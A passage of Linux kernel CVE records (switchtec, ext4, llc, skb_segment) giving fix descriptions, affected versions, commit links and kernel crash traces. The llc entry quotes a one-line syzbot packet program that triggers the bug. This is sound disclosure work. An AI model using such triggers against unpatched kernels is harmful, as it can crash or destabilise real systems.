"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"drivers/pci/switch/switchtec.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.77",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.16",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.4",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.77",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.16",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.4",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI: switchtec: Fix stdev_release() crash after surprise hot remove\n\nA PCI device hot removal may occur while stdev-\u003ecdev is held open. The call\nto stdev_release() then happens during close or exit, at a point way past\nswitchtec_pci_remove(). Otherwise the last ref would vanish with the\ntrailing put_device(), just before return.\n\nAt that later point in time, the devm cleanup has already removed the\nstdev-\u003emmio_mrpc mapping. Also, the stdev-\u003epdev reference was not a counted\none. Therefore, in DMA mode, the iowrite32() in stdev_release() will cause\na fatal page fault, and the subsequent dma_free_coherent(), if reached,\nwould pass a stale \u0026stdev-\u003epdev-\u003edev pointer.\n\nFix by moving MRPC DMA shutdown into switchtec_pci_remove(), after\nstdev_kill(). Counting the stdev-\u003epdev ref is now optional, but may prevent\nfuture accidents.\n\nReproducible via the script at\nhttps://lore.kernel.org/r/20231113212150.96410-1-dns@arista.com"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T07:39:58.447Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/d8c293549946ee5078ed0ab77793cec365559355"
},
{
"url": "https://git.kernel.org/stable/c/4a5d0528cf19dbf060313dffbe047bc11c90c24c"
},
{
"url": "https://git.kernel.org/stable/c/ff1c7e2fb9e9c3f53715fbe04d3ac47b80be7eb8"
},
{
"url": "https://git.kernel.org/stable/c/1d83c85922647758c1f1e4806a4c5c3cf591a20a"
},
{
"url": "https://git.kernel.org/stable/c/0233b836312e39a3c763fb53512b3fa455b473b3"
},
{
"url": "https://git.kernel.org/stable/c/e129c7fa7070fbce57feb0bfc5eaa65eef44b693"
},
{
"url": "https://git.kernel.org/stable/c/df25461119d987b8c81d232cfe4411e91dcabe66"
}
],
"title": "PCI: switchtec: Fix stdev_release() crash after surprise hot remove",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2023-52617",
"datePublished": "2024-03-18T10:19:04.651Z",
"dateReserved": "2024-03-06T09:52:12.089Z",
"dateUpdated": "2025-05-04T07:39:58.447Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26601 (GCVE-0-2024-26601)
Vulnerability from cvelistv5
Published
2024-02-24 14:56
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
ext4: regenerate buddy after block freeing failed if under fc replay
This mostly reverts commit 6bd97bf273bd ("ext4: remove redundant
mb_regenerate_buddy()") and reintroduces mb_regenerate_buddy(). Based on
code in mb_free_blocks(), fast commit replay can end up marking as free
blocks that are already marked as such. This causes corruption of the
buddy bitmap so we need to regenerate it in that case.
References
| URL | Tags | |||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 0983142c5f17a62055ec851372273c3bc77e4788 Version: 6bd97bf273bdb4944904e57480f6545bca48ad77 Version: 6bd97bf273bdb4944904e57480f6545bca48ad77 Version: 6bd97bf273bdb4944904e57480f6545bca48ad77 Version: 6bd97bf273bdb4944904e57480f6545bca48ad77 Version: 6bd97bf273bdb4944904e57480f6545bca48ad77 |
||
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26601",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-03-01T15:48:58.021731Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-06-04T17:48:55.950Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
},
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.651Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/94ebf71bddbcd4ab1ce43ae32c6cb66396d2d51a"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c1317822e2de80e78f137d3a2d99febab1b80326"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/78327acd4cdc4a1601af718b781eece577b6b7d4"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/ea42d6cffb0dd27a417f410b9d0011e9859328cb"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/6b0d48647935e4b8c7b75d1eccb9043fcd4ee581"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c9b528c35795b711331ed36dc3dbee90d5812d4e"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
}
],
"title": "CVE Program Container"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"fs/ext4/mballoc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "94ebf71bddbcd4ab1ce43ae32c6cb66396d2d51a",
"status": "affected",
"version": "0983142c5f17a62055ec851372273c3bc77e4788",
"versionType": "git"
},
{
"lessThan": "c1317822e2de80e78f137d3a2d99febab1b80326",
"status": "affected",
"version": "6bd97bf273bdb4944904e57480f6545bca48ad77",
"versionType": "git"
},
{
"lessThan": "78327acd4cdc4a1601af718b781eece577b6b7d4",
"status": "affected",
"version": "6bd97bf273bdb4944904e57480f6545bca48ad77",
"versionType": "git"
},
{
"lessThan": "ea42d6cffb0dd27a417f410b9d0011e9859328cb",
"status": "affected",
"version": "6bd97bf273bdb4944904e57480f6545bca48ad77",
"versionType": "git"
},
{
"lessThan": "6b0d48647935e4b8c7b75d1eccb9043fcd4ee581",
"status": "affected",
"version": "6bd97bf273bdb4944904e57480f6545bca48ad77",
"versionType": "git"
},
{
"lessThan": "c9b528c35795b711331ed36dc3dbee90d5812d4e",
"status": "affected",
"version": "6bd97bf273bdb4944904e57480f6545bca48ad77",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"fs/ext4/mballoc.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "5.11"
},
{
"lessThan": "5.11",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.211",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.150",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.78",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.17",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.5",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.211",
"versionStartIncluding": "5.10.181",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.150",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.78",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.17",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.5",
"versionStartIncluding": "5.11",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "5.11",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: regenerate buddy after block freeing failed if under fc replay\n\nThis mostly reverts commit 6bd97bf273bd (\"ext4: remove redundant\nmb_regenerate_buddy()\") and reintroduces mb_regenerate_buddy(). Based on\ncode in mb_free_blocks(), fast commit replay can end up marking as free\nblocks that are already marked as such. This causes corruption of the\nbuddy bitmap so we need to regenerate it in that case."
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:05.085Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/94ebf71bddbcd4ab1ce43ae32c6cb66396d2d51a"
},
{
"url": "https://git.kernel.org/stable/c/c1317822e2de80e78f137d3a2d99febab1b80326"
},
{
"url": "https://git.kernel.org/stable/c/78327acd4cdc4a1601af718b781eece577b6b7d4"
},
{
"url": "https://git.kernel.org/stable/c/ea42d6cffb0dd27a417f410b9d0011e9859328cb"
},
{
"url": "https://git.kernel.org/stable/c/6b0d48647935e4b8c7b75d1eccb9043fcd4ee581"
},
{
"url": "https://git.kernel.org/stable/c/c9b528c35795b711331ed36dc3dbee90d5812d4e"
}
],
"title": "ext4: regenerate buddy after block freeing failed if under fc replay",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26601",
"datePublished": "2024-02-24T14:56:56.324Z",
"dateReserved": "2024-02-19T14:20:24.128Z",
"dateUpdated": "2025-05-04T08:52:05.085Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2024-26635 (GCVE-0-2024-26635)
Vulnerability from cvelistv5
Published
2024-03-18 10:14
Modified
2025-05-04 08:52
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
llc: Drop support for ETH_P_TR_802_2.
syzbot reported an uninit-value bug below. [0]
llc supports ETH_P_802_2 (0x0004) and used to support ETH_P_TR_802_2
(0x0011), and syzbot abused the latter to trigger the bug.
write$tun(r0, &(0x7f0000000040)={@val={0x0, 0x11}, @val, @mpls={[], @llc={@snap={0xaa, 0x1, ')', "90e5dd"}}}}, 0x16)
llc_conn_handler() initialises local variables {saddr,daddr}.mac
based on skb in llc_pdu_decode_sa()/llc_pdu_decode_da() and passes
them to __llc_lookup().
However, the initialisation is done only when skb->protocol is
htons(ETH_P_802_2), otherwise, __llc_lookup_established() and
__llc_lookup_listener() will read garbage.
The missing initialisation existed prior to commit 211ed865108e
("net: delete all instances of special processing for token ring").
It removed the part to kick out the token ring stuff but forgot to
close the door allowing ETH_P_TR_802_2 packets to sneak into llc_rcv().
Let's remove llc_tr_packet_type and complete the deprecation.
[0]:
BUG: KMSAN: uninit-value in __llc_lookup_established+0xe9d/0xf90
__llc_lookup_established+0xe9d/0xf90
__llc_lookup net/llc/llc_conn.c:611 [inline]
llc_conn_handler+0x4bd/0x1360 net/llc/llc_conn.c:791
llc_rcv+0xfbb/0x14a0 net/llc/llc_input.c:206
__netif_receive_skb_one_core net/core/dev.c:5527 [inline]
__netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5641
netif_receive_skb_internal net/core/dev.c:5727 [inline]
netif_receive_skb+0x58/0x660 net/core/dev.c:5786
tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1555
tun_get_user+0x53af/0x66d0 drivers/net/tun.c:2002
tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048
call_write_iter include/linux/fs.h:2020 [inline]
new_sync_write fs/read_write.c:491 [inline]
vfs_write+0x8ef/0x1490 fs/read_write.c:584
ksys_write+0x20f/0x4c0 fs/read_write.c:637
__do_sys_write fs/read_write.c:649 [inline]
__se_sys_write fs/read_write.c:646 [inline]
__x64_sys_write+0x93/0xd0 fs/read_write.c:646
do_syscall_x64 arch/x86/entry/common.c:51 [inline]
do_syscall_64+0x44/0x110 arch/x86/entry/common.c:82
entry_SYSCALL_64_after_hwframe+0x63/0x6b
Local variable daddr created at:
llc_conn_handler+0x53/0x1360 net/llc/llc_conn.c:783
llc_rcv+0xfbb/0x14a0 net/llc/llc_input.c:206
CPU: 1 PID: 5004 Comm: syz-executor994 Not tainted 6.6.0-syzkaller-14500-g1c41041124bd #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/09/2023
References
| URL | Tags | |||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||
Impacted products
| Vendor | Product | Version | ||
|---|---|---|---|---|
| Linux | Linux |
Version: 211ed865108e24697b44bee5daac502ee6bdd4a4 Version: 211ed865108e24697b44bee5daac502ee6bdd4a4 Version: 211ed865108e24697b44bee5daac502ee6bdd4a4 Version: 211ed865108e24697b44bee5daac502ee6bdd4a4 Version: 211ed865108e24697b44bee5daac502ee6bdd4a4 Version: 211ed865108e24697b44bee5daac502ee6bdd4a4 Version: 211ed865108e24697b44bee5daac502ee6bdd4a4 Version: 211ed865108e24697b44bee5daac502ee6bdd4a4 |
||
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T00:07:19.852Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/165ad1e22779685c3ed3dd349c6c4c632309cc62"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/b8e8838f82f332ae80c643dbb1ca4418d0628097"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/9ccdef19cf9497c2803b005369668feb91cacdfd"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/c0fe2fe7a5a291dfcf6dc64301732c8d3dc6a828"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/660c3053d992b68fee893a0e9ec9159228cffdc6"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/f1f34a515fb1e25e85dee94f781e7869ae351fb8"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/df57fc2f2abf548aa889a36ab0bdcc94a75399dc"
},
{
"tags": [
"x_transferred"
],
"url": "https://git.kernel.org/stable/c/e3f9bed9bee261e3347131764e42aeedf1ffea61"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00017.html"
},
{
"tags": [
"x_transferred"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/06/msg00020.html"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-26635",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-09-10T15:55:09.935989Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-09-11T17:33:17.228Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"product": "Linux",
"programFiles": [
"include/net/llc_pdu.h",
"net/llc/llc_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"lessThan": "165ad1e22779685c3ed3dd349c6c4c632309cc62",
"status": "affected",
"version": "211ed865108e24697b44bee5daac502ee6bdd4a4",
"versionType": "git"
},
{
"lessThan": "b8e8838f82f332ae80c643dbb1ca4418d0628097",
"status": "affected",
"version": "211ed865108e24697b44bee5daac502ee6bdd4a4",
"versionType": "git"
},
{
"lessThan": "9ccdef19cf9497c2803b005369668feb91cacdfd",
"status": "affected",
"version": "211ed865108e24697b44bee5daac502ee6bdd4a4",
"versionType": "git"
},
{
"lessThan": "c0fe2fe7a5a291dfcf6dc64301732c8d3dc6a828",
"status": "affected",
"version": "211ed865108e24697b44bee5daac502ee6bdd4a4",
"versionType": "git"
},
{
"lessThan": "660c3053d992b68fee893a0e9ec9159228cffdc6",
"status": "affected",
"version": "211ed865108e24697b44bee5daac502ee6bdd4a4",
"versionType": "git"
},
{
"lessThan": "f1f34a515fb1e25e85dee94f781e7869ae351fb8",
"status": "affected",
"version": "211ed865108e24697b44bee5daac502ee6bdd4a4",
"versionType": "git"
},
{
"lessThan": "df57fc2f2abf548aa889a36ab0bdcc94a75399dc",
"status": "affected",
"version": "211ed865108e24697b44bee5daac502ee6bdd4a4",
"versionType": "git"
},
{
"lessThan": "e3f9bed9bee261e3347131764e42aeedf1ffea61",
"status": "affected",
"version": "211ed865108e24697b44bee5daac502ee6bdd4a4",
"versionType": "git"
}
]
},
{
"defaultStatus": "affected",
"product": "Linux",
"programFiles": [
"include/net/llc_pdu.h",
"net/llc/llc_core.c"
],
"repo": "https://git.kernel.org/pub/scm/linux/kernel/git/stable/linux.git",
"vendor": "Linux",
"versions": [
{
"status": "affected",
"version": "3.5"
},
{
"lessThan": "3.5",
"status": "unaffected",
"version": "0",
"versionType": "semver"
},
{
"lessThanOrEqual": "4.19.*",
"status": "unaffected",
"version": "4.19.307",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.4.*",
"status": "unaffected",
"version": "5.4.269",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.10.*",
"status": "unaffected",
"version": "5.10.210",
"versionType": "semver"
},
{
"lessThanOrEqual": "5.15.*",
"status": "unaffected",
"version": "5.15.149",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.1.*",
"status": "unaffected",
"version": "6.1.76",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.6.*",
"status": "unaffected",
"version": "6.6.15",
"versionType": "semver"
},
{
"lessThanOrEqual": "6.7.*",
"status": "unaffected",
"version": "6.7.3",
"versionType": "semver"
},
{
"lessThanOrEqual": "*",
"status": "unaffected",
"version": "6.8",
"versionType": "original_commit_for_fix"
}
]
}
],
"cpeApplicability": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "4.19.307",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.4.269",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.10.210",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "5.15.149",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.1.76",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.6.15",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.7.3",
"versionStartIncluding": "3.5",
"vulnerable": true
},
{
"criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*",
"versionEndExcluding": "6.8",
"versionStartIncluding": "3.5",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "In the Linux kernel, the following vulnerability has been resolved:\n\nllc: Drop support for ETH_P_TR_802_2.\n\nsyzbot reported an uninit-value bug below. [0]\n\nllc supports ETH_P_802_2 (0x0004) and used to support ETH_P_TR_802_2\n(0x0011), and syzbot abused the latter to trigger the bug.\n\n write$tun(r0, \u0026(0x7f0000000040)={@val={0x0, 0x11}, @val, @mpls={[], @llc={@snap={0xaa, 0x1, \u0027)\u0027, \"90e5dd\"}}}}, 0x16)\n\nllc_conn_handler() initialises local variables {saddr,daddr}.mac\nbased on skb in llc_pdu_decode_sa()/llc_pdu_decode_da() and passes\nthem to __llc_lookup().\n\nHowever, the initialisation is done only when skb-\u003eprotocol is\nhtons(ETH_P_802_2), otherwise, __llc_lookup_established() and\n__llc_lookup_listener() will read garbage.\n\nThe missing initialisation existed prior to commit 211ed865108e\n(\"net: delete all instances of special processing for token ring\").\n\nIt removed the part to kick out the token ring stuff but forgot to\nclose the door allowing ETH_P_TR_802_2 packets to sneak into llc_rcv().\n\nLet\u0027s remove llc_tr_packet_type and complete the deprecation.\n\n[0]:\nBUG: KMSAN: uninit-value in __llc_lookup_established+0xe9d/0xf90\n __llc_lookup_established+0xe9d/0xf90\n __llc_lookup net/llc/llc_conn.c:611 [inline]\n llc_conn_handler+0x4bd/0x1360 net/llc/llc_conn.c:791\n llc_rcv+0xfbb/0x14a0 net/llc/llc_input.c:206\n __netif_receive_skb_one_core net/core/dev.c:5527 [inline]\n __netif_receive_skb+0x1a6/0x5a0 net/core/dev.c:5641\n netif_receive_skb_internal net/core/dev.c:5727 [inline]\n netif_receive_skb+0x58/0x660 net/core/dev.c:5786\n tun_rx_batched+0x3ee/0x980 drivers/net/tun.c:1555\n tun_get_user+0x53af/0x66d0 drivers/net/tun.c:2002\n tun_chr_write_iter+0x3af/0x5d0 drivers/net/tun.c:2048\n call_write_iter include/linux/fs.h:2020 [inline]\n new_sync_write fs/read_write.c:491 [inline]\n vfs_write+0x8ef/0x1490 fs/read_write.c:584\n ksys_write+0x20f/0x4c0 fs/read_write.c:637\n __do_sys_write fs/read_write.c:649 [inline]\n __se_sys_write fs/read_write.c:646 [inline]\n __x64_sys_write+0x93/0xd0 fs/read_write.c:646\n do_syscall_x64 arch/x86/entry/common.c:51 [inline]\n do_syscall_64+0x44/0x110 arch/x86/entry/common.c:82\n entry_SYSCALL_64_after_hwframe+0x63/0x6b\n\nLocal variable daddr created at:\n llc_conn_handler+0x53/0x1360 net/llc/llc_conn.c:783\n llc_rcv+0xfbb/0x14a0 net/llc/llc_input.c:206\n\nCPU: 1 PID: 5004 Comm: syz-executor994 Not tainted 6.6.0-syzkaller-14500-g1c41041124bd #0\nHardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 10/09/2023"
}
],
"providerMetadata": {
"dateUpdated": "2025-05-04T08:52:47.059Z",
"orgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"shortName": "Linux"
},
"references": [
{
"url": "https://git.kernel.org/stable/c/165ad1e22779685c3ed3dd349c6c4c632309cc62"
},
{
"url": "https://git.kernel.org/stable/c/b8e8838f82f332ae80c643dbb1ca4418d0628097"
},
{
"url": "https://git.kernel.org/stable/c/9ccdef19cf9497c2803b005369668feb91cacdfd"
},
{
"url": "https://git.kernel.org/stable/c/c0fe2fe7a5a291dfcf6dc64301732c8d3dc6a828"
},
{
"url": "https://git.kernel.org/stable/c/660c3053d992b68fee893a0e9ec9159228cffdc6"
},
{
"url": "https://git.kernel.org/stable/c/f1f34a515fb1e25e85dee94f781e7869ae351fb8"
},
{
"url": "https://git.kernel.org/stable/c/df57fc2f2abf548aa889a36ab0bdcc94a75399dc"
},
{
"url": "https://git.kernel.org/stable/c/e3f9bed9bee261e3347131764e42aeedf1ffea61"
}
],
"title": "llc: Drop support for ETH_P_TR_802_2.",
"x_generator": {
"engine": "bippy-1.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "416baaa9-dc9f-4396-8d5f-8c081fb06d67",
"assignerShortName": "Linux",
"cveId": "CVE-2024-26635",
"datePublished": "2024-03-18T10:14:47.213Z",
"dateReserved": "2024-02-19T14:20:24.136Z",
"dateUpdated": "2025-05-04T08:52:47.059Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2023-52435 (GCVE-0-2023-52435)
Vulnerability from cvelistv5
Published
2024-02-20 18:27
Modified
2025-05-04 07:36
Severity ?
VLAI Severity ?
EPSS score ?
Summary
In the Linux kernel, the following vulnerability has been resolved:
net: prevent mss overflow in skb_segment()
Once again syzbot is able to crash the kernel in skb_segment() [1]
GSO_BY_FRAGS is a forbidden value, but unfortunately the following
computation in skb_segment() can reach it quite easily :
mss = mss * partial_segs;
65535 = 3 * 5 * 17 * 257, so many initial values of mss can lead to
a bad final result.
Make sure to limit segmentation so that the new mss value is smaller
than GSO_BY_FRAGS.
[1]
general protection fault, probably for non-canonical address 0xdffffc000000000e: 0000 [#1] PREEMPT SMP KASAN
KASAN: null-ptr-deref in range [0x0000000000000070-0x0000000000000077]
CPU: 1 PID: 5079 Comm: syz-executor993 Not tainted 6.7.0-rc4-syzkaller-00141-g1ae4cd3cbdd0 #0
Hardware name: Google Google Compute Engine/Google Compute Engine, BIOS Google 11/10/2023
RIP: 0010:skb_segment+0x181d/0x3f30 net/core/skbuff.c:4551
Code: 83 e3 02 e9 fb ed ff ff e8 90 68 1c f9 48 8b 84 24 f8 00 00 00 48 8d 78 70 48 b8 00 00 00 00 00 fc ff df 48 89 fa 48 c1 ea 03 <0f> b6 04 02 84 c0 74 08 3c 03 0f 8e 8a 21 00 00 48 8b 84 24 f8 00
RSP: 0018:ffffc900043473d0 EFLAGS: 00010202
RAX: dffffc0000000000 RBX: 0000000000010046 RCX: ffffffff886b1597
RDX: 000000000000000e RSI: ffffffff886b2520 RDI: 0000000000000070
RBP: ffffc90004347578 R08: 0000000000000005 R09: 000000000000ffff
R10: 000000000000ffff R11: 0000000000000002 R12: ffff888063202ac0
R13: 0000000000010000 R14: 000000000000ffff R15: 0000000000000046
FS: 0000555556e7e380(0000) GS:ffff8880b9900000(0000) knlGS:0000000000000000
CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
CR2: 0000000020010000 CR3: 0000000027ee2000 CR4: 00000000003506f0
DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Call Trace:
<TASK>
udp6_ufo_fragment+0xa0e/0xd00 net/ipv6/udp_offload.c:109
ipv6_gso_segment+0x534/0x17e0 net/ipv6/ip6_offload.c:120
skb_mac_gso_segment+0x290/0x610 net/core/gso.c:53
__skb_gso_segment+0x339/0x710 net/core/gso.c:124
skb_gso_segment include/net/gso.h:83 [inline]
validate_xmit_skb+0x36c/0xeb0 net/core/dev.c:3626
__dev_queue_xmit+0x6f3/0x3d60 net/core/dev.c:4338
dev_queue_xmit include/linux/netdevice.h:3134 [inline]
packet_xmit+0x257/0x380 net/packet/af_packet.c:276
packet_snd net/packet/af_packet.c:3087 [inline]
